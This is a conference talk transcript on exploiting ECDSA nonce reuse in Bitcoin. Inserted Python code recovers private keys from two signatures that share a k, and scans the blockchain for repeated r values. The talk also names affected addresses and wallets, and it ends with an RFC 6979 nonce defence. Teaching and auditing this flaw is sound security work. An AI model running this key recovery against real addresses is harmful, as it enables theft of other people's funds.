
Exploiting ECDSA Failures in the Bitcoin Blockchain

Filippo Valsorda

October 15, 2014

Transcript

  1. Filippo Valsorda
    Exploiting ECDSA
    Failures in the
    Bitcoin Blockchain
    HITB2014KUL

  2. CloudFlare security team
    @FiloSottile
    I mess with cryptography.
    And open source.
    !
    filippo.io
    Filippo Valsorda

  3. But you probably
    know me for this

  4. https://filippo.io/heartbleed

  5. Public key +
    Private key
    A wallet
    The address: hash ( public key )
    1DY5YvRxSwomrK7nELDZzAidQQ6ktjRR9A

  6. A signed statement,
    published to the world
    and recorded in the blockchain
    A transaction
    “This money I can spend, can now be spent by Y”

  7. A: This money I can spend, can now be spent by X
    …: This money I can spend, can now be spent by …
    …: This money I can spend, can now be spent by …
    …: This money I can spend, can now be spent by …
    X: This money I can spend, can now be spent by Y
    …: This money I can spend, can now be spent by …
    …: This money I can spend, can now be spent by …
    Y has this money to spend

  8. A: This money I can spend, can now be spent by X
    Signed with A’s private key
    Hash of X’s public key

  9. OP_DUP OP_HASH160 <pubKeyHash>
     OP_EQUALVERIFY
     OP_CHECKSIG
     Actually

  10. An EC-based signature scheme
     As seen in TLS, DNSSEC, the PS3…
     Elliptic Curve Digital
     Signature Algorithm

  11. Global: point G on a curve
     Private key: a random number d
     Public key: d × G
     A summary

  12. e = hash(message)
     k = a random number
     (x, y) = k × G
     r = x
     Signature
     Sig: [r, (e+r*d)/k]

  13. Unless…
    Seems fine, right?
    What happens if that k is not
    random?

  14. If you reuse k
     k1 = k2
     (x, y) = k × G
     r = x
     r1 = r2
     Sig1: [r, (e1+r*d)/k]
     Sig2: [r, (e2+r*d)/k]

  15. If you reuse k
     Sig1: [ r , (e1+r*d)/k]
     Sig2: [ r , (e2+r*d)/k]
     k1 = k2
     (x, y) = k × G
     r = x
     r1 = r2

  16. If you reuse k
     Sig1: [r, (e1+r*d)/k ]
     Sig2: [r, (e2+r*d)/k ]
     k1 = k2
     (x, y) = k × G
     r = x
     r1 = r2

  17. If you reuse k
     k = (e1 - e2) / [(e1+r*d)/k - (e2+r*d)/k]
     d = ([(e1+r*d)/k]*k - e1) / r
     (all arithmetic mod n, the order of G; the two signatures are s1 = (e1+r*d)/k and s2 = (e2+r*d)/k, so s1 - s2 = (e1 - e2)/k)
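
Carrying the algebra of slides 14 to 17 through in working code, as an added example that is not the deck's code and not blockchainr: a pure-Python secp256k1 implementation signs two constructed messages with the same k, then recovers k and d exactly as above. The private key, the nonce and the messages are made up for the demo. One practical detail the slides leave out: a wallet may publish s normalised to n - s (the "low-S" form), which leaves r untouched but flips the sign of s1 - s2, so the recovery tries the negated s2 as well and keeps whichever candidate reproduces the public key.

```python
import hashlib

# secp256k1 domain parameters (the curve Bitcoin uses)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def point_add(p1, p2):
    """Affine addition on y^2 = x^3 + 7 over F_P; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                  # Q + (-Q)
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P   # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P    # chord slope
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def scalar_mult(k, point):
    """Double-and-add k*point; scalar_mult(d, G) is the public key."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def msg_hash(message):
    """e = hash(message); Bitcoin double-SHA256s the transaction preimage."""
    return int.from_bytes(hashlib.sha256(hashlib.sha256(message).digest()).digest(), "big")


def sign(d, e, k):
    """Textbook ECDSA from slide 12: r = (k*G).x, s = (e + r*d)/k, both mod N.
    k is an explicit parameter precisely so the demo can misuse the same one twice."""
    r = scalar_mult(k, G)[0] % N
    s = pow(k, -1, N) * (e + r * d) % N
    return r, s


def recover_private_key(r, s1, e1, s2, e2, pubkey):
    """Two signatures sharing r (hence k) under one public key -> d, or None.

    k = (e1 - e2)/(s1 - s2) and d = (s1*k - e1)/r, mod N.  Trying s2 and -s2
    covers low-S normalisation of either signature: negating both s values
    gives the same d, so two attempts cover all four sign combinations.
    """
    for s2_try in (s2, (-s2) % N):
        if s1 == s2_try:
            continue                                 # s1 - s2 not invertible
        k = (e1 - e2) * pow(s1 - s2_try, -1, N) % N
        d = (s1 * k - e1) * pow(r, -1, N) % N
        if scalar_mult(d, G) == pubkey:              # only a real hit survives
            return d
    return None


def demo():
    """Constructed scenario: one wallet signs two spends with the same k."""
    d = 0x0F0E0D0C0B0A09080706050403020100FFEEDDCCBBAA99887766554433221100  # made-up key
    k = 0x6B2A5D8F13C4E7A0B9D2F5C8E1A4B7D0C3F6A9B2D5E8F1A4C7B0D3E6F9A2B5C8  # reused nonce
    pubkey = scalar_mult(d, G)
    e1 = msg_hash(b"tx1: spend 1 BTC to X")          # constructed messages
    e2 = msg_hash(b"tx2: spend 2 BTC to Y")
    r1, s1 = sign(d, e1, k)
    r2, s2 = sign(d, e2, k)
    assert r1 == r2                                  # the tell-tale sign in the chain
    return recover_private_key(r1, s1, e1, s2, e2, pubkey) == d


if __name__ == "__main__":
    print("recovered private key matches:", demo())
```

On real chain data e is the double-SHA256 of the input's signature-hash preimage rather than an arbitrary string, and the public-key check at the end is what separates a genuine k reuse from two different keys that happen to share an r.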

  18. Imperialviolet
     (screenshot of the blog post)

  19. Sony’s ECDSA code
     Wednesday, 29 December 2010
     (screenshot of the blog post)

  20. the
    blockchain

  21. To spend money:
     the public key of the address;
     a signature with that key
     Reminder
     when money is moved, a signature is published

  22. for block in chain:
         for tx in block:
             for input in tx:
                 ...
     An easy search
     An input is money being spent in the tx

  23. Extract r from the signature;
    take note of where we found
    it in a lookup table;
    check if we found it before.
    An easy search

  24. Done!
    If anyone reuses k,
    we will find two equal r.

  25. Well… No.
    I mean, yes, but there are
    100M inputs in the blockchain.
    Done!
    Out of memory! :(

  26. First pass: filter the possible r.
     Add each r to a Bloom filter;
     if it was already present, add it to a set.
     Second pass: if r is present in
     the set, export sig and pubkey.
     A smarter search

  27. A smarter search
     (diagram: Blockchain → Bloom filter, + Set; r = 42, r = 42)

  28. A smarter search
     (diagram: the second r = 42 is already in the Bloom filter? → 42 goes into the Set)

  29. A smarter search
     (diagram: Set {19, 36, 42} checked against the Blockchain ✓ → Final list: Sig, Pubkey, Tx…)

  30. Group the list by (r, pubkey)
    and recover d
    from pairs of signatures!
    Finally

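
The two-pass search of slides 22 to 30 as an added, self-contained example (not blockchainr, the tool the talk releases): a small Bloom filter, the set of repeated r values, the export pass, and the final grouping by (r, pubkey) from which the signature pairs are taken. The record layout (txid, vin, r, s, pubkey), the sample r values and the pubkey labels are assumptions constructed for the demo.

```python
import hashlib
from collections import defaultdict
from itertools import combinations


class BloomFilter:
    """Fixed-size bit array with num_hashes SHA-256-derived positions per item.
    Lookups can give false positives but never false negatives, which is what
    the first pass needs: a genuinely repeated r is never missed."""

    def __init__(self, num_bits, num_hashes):
        self.num_bits = num_bits
        self.num_hashes = num_hashes
        self.bits = bytearray((num_bits + 7) // 8)

    def _positions(self, r):
        data = r.to_bytes(32, "big")                 # r is a 256-bit x-coordinate
        for i in range(self.num_hashes):
            digest = hashlib.sha256(bytes([i]) + data).digest()
            yield int.from_bytes(digest[:8], "big") % self.num_bits

    def add(self, r):
        for pos in self._positions(r):
            self.bits[pos >> 3] |= 1 << (pos & 7)

    def might_contain(self, r):
        return all(self.bits[pos >> 3] & (1 << (pos & 7)) for pos in self._positions(r))


def find_reused_r(inputs, num_bits=1 << 24, num_hashes=4):
    """Two passes over a list of inputs (dicts with txid, vin, r, s, pubkey).

    Pass 1 holds only the Bloom filter plus the set of r values seen (or
    suspected seen) twice, not a table of every input.  Pass 2 exports the
    signatures whose r is in that set and groups them by (r, pubkey): two
    signatures in one group share k under one private key.
    """
    bloom = BloomFilter(num_bits, num_hashes)
    repeated = set()
    for inp in inputs:                               # pass 1: filter
        if bloom.might_contain(inp["r"]):
            repeated.add(inp["r"])                   # real repeat or a false positive
        else:
            bloom.add(inp["r"])
    groups = defaultdict(list)
    for inp in inputs:                               # pass 2: export
        if inp["r"] in repeated:
            groups[(inp["r"], inp["pubkey"])].append(inp)
    # a false positive, or one r used by two different keys, leaves groups of size 1
    return {key: sigs for key, sigs in groups.items() if len(sigs) >= 2}


def signature_pairs(groups):
    """Every pair of signatures within a (r, pubkey) group: each recovers d."""
    return [pair for sigs in groups.values() for pair in combinations(sigs, 2)]


# Constructed sample inputs: r values are made-up 256-bit numbers, pubkeys are labels.
R_A = 0x3E3A5B9C1D0F2E4A6B8C9D0E1F2A3B4C5D6E7F8091A2B3C4D5E6F70819A2B3C4
R_B = 0x7C1B2A3948576657A8B9CADBECFD0E1F2031425364758697A8B9CADBECFD0E1F
R_C = 0xB0C1D2E3F405162738495A6B7C8D9EAFB0C1D2E3F405162738495A6B7C8D9EAF
SAMPLE_INPUTS = [
    {"txid": "tx01", "vin": 0, "r": R_A, "s": 0x11, "pubkey": "pubkey A"},
    {"txid": "tx02", "vin": 1, "r": R_B, "s": 0x22, "pubkey": "pubkey B"},
    {"txid": "tx03", "vin": 0, "r": R_A, "s": 0x33, "pubkey": "pubkey A"},  # same r, same key
    {"txid": "tx04", "vin": 0, "r": R_C, "s": 0x44, "pubkey": "pubkey C"},
    {"txid": "tx05", "vin": 2, "r": R_C, "s": 0x55, "pubkey": "pubkey D"},  # same r, two keys
    {"txid": "tx06", "vin": 0, "r": R_A, "s": 0x66, "pubkey": "pubkey A"},  # k reused a third time
]

if __name__ == "__main__":
    for (r, pubkey), sigs in find_reused_r(SAMPLE_INPUTS).items():
        print(hex(r), pubkey, [s["txid"] for s in sigs])
```

The memory bound of pass 1 is the filter size plus the repeated set, which is small because nonce reuse is rare; an r that two different public keys share (tx04 and tx05 above) is flagged by the filter but dropped by the grouping, since two unknown private keys and one unknown k cannot be solved from two equations.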
  31. A ready-to-use tool
     Blockchainr
     github.com/filosottile/blockchainr

  32. https://filippo.io/hitb
    If you want to
    follow from home

  33. Does this happen?

  34. Yes.
    Does this happen?

  35. (chart) Vertical: address. Color: r

  36. Multisignature transactions (weird)

  37. 1KtjBE8yDxoqNTSyLG2re4qtKK19KpvVLT
    1BkE8ttBRUKVNTj3Lx1EPsw7vVbhuLZhBt

  38. (chart) Vertical: address. Color: r

  39. “gomez”
    1GozmcsMBC7bnMVUQLTKEw5vBxbSeG4erW / 1HKywxiL4JziqXrzLKhmB6a74ma6kxbSDj

  40. Repeated r in the same transaction

  41. https://bitcointalk.org/index.php?topic=271486
    “Bad signatures leading to
    55.82152538 BTC theft (so far)”

  42. https://bitcointalk.org/index.php?topic=277595
    Blockchain.info security
    [FUNDS STOLEN]

  44. Nick Sullivan, “Exploiting randomness” demo

  45. k must be secret and unique
    What’s needed
    Not necessarily random

  46. Generate k deterministically,
    as a function of private key
    and message.
    RFC 6979
    k = HMAC_DRBG ( d, H (m) )

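
The k = HMAC_DRBG(d, H(m)) construction written out, as an added example taken from RFC 6979 section 3.2 and not from the deck or from any of the wallets reviewed below. The function is generic in the group order q; the demo feeds it secp256k1's order, and the private key and messages in demo() are made up. It shows the property slide 45 asks for: the same (d, m) always yields the same k, a different m yields an unrelated k, and no RNG is consulted at signing time.

```python
import hashlib
import hmac

SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141


def hash_message(message):
    """H(m): the message hash the nonce is derived from."""
    return hashlib.sha256(message).digest()


def rfc6979_nonce(priv, h1, q, hashfunc=hashlib.sha256):
    """Deterministic ECDSA nonce k per RFC 6979 section 3.2.

    priv: the private key d as an int; h1: H(m) as bytes; q: the group order.
    Returns k with 1 <= k < q.  Only d and H(m) go into the HMAC_DRBG seed,
    so k is secret (it depends on d) and unique per message (it depends on m).
    """
    qlen = q.bit_length()
    rlen = (qlen + 7) // 8
    hlen = hashfunc().digest_size

    def bits2int(b):                                 # leftmost qlen bits of b
        x = int.from_bytes(b, "big")
        extra = 8 * len(b) - qlen
        return x >> extra if extra > 0 else x

    def int2octets(x):
        return x.to_bytes(rlen, "big")

    def bits2octets(b):
        return int2octets(bits2int(b) % q)

    def mac(key, data):
        return hmac.new(key, data, hashfunc).digest()

    x = int2octets(priv)
    h = bits2octets(h1)
    V = b"\x01" * hlen                               # steps b-c: initial state
    K = b"\x00" * hlen
    K = mac(K, V + b"\x00" + x + h)                  # steps d-g: mix in d and H(m)
    V = mac(K, V)
    K = mac(K, V + b"\x01" + x + h)
    V = mac(K, V)
    while True:                                      # step h: generate until in range
        T = b""
        while 8 * len(T) < qlen:
            V = mac(K, V)
            T += V
        k = bits2int(T)
        if 1 <= k < q:
            return k
        K = mac(K, V + b"\x00")                      # out of range: update and retry
        V = mac(K, V)


def demo():
    """Same key and message twice -> same k; another message -> another k."""
    d = 0x0F0E0D0C0B0A09080706050403020100FFEEDDCCBBAA99887766554433221100  # made-up key
    k1 = rfc6979_nonce(d, hash_message(b"spend 1 BTC to X"), SECP256K1_N)
    k1_again = rfc6979_nonce(d, hash_message(b"spend 1 BTC to X"), SECP256K1_N)
    k2 = rfc6979_nonce(d, hash_message(b"spend 2 BTC to Y"), SECP256K1_N)
    return k1 == k1_again and k1 != k2


if __name__ == "__main__":
    print("deterministic and message-dependent:", demo())
```

The RFC's appendix A lists test vectors (for example NIST P-256 with SHA-256 and the message "sample") that any implementation of this function should reproduce bit for bit; signing the same message twice with the same key then yields the same signature, which is harmless, whereas two different messages under one k is the failure the rest of the deck exploits.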
  47. Bitcoin Core
     unsafe: OpenSSL
     patch by AGL waiting on master

  48. Electrum
     safe since v1.9
     correct use of python-ecdsa

  49. MultiBit / bitcoinj
     safe
     correct use of BouncyCastle

  50. Blockchain.info
    Unsafe
    relies on the browser RNG (if any!)

  51. bitrated / bitcoinjs-lib
    Safe
    Hashes privkey, message and random

  52. Armory
     unsafe (? - 90%)
     Crypto++ seems to use a random value

  53. Trezor
    Safe
    Implements RFC 6979

  54. Q&A
    @filosottile
    filippo.io/hitb-slides
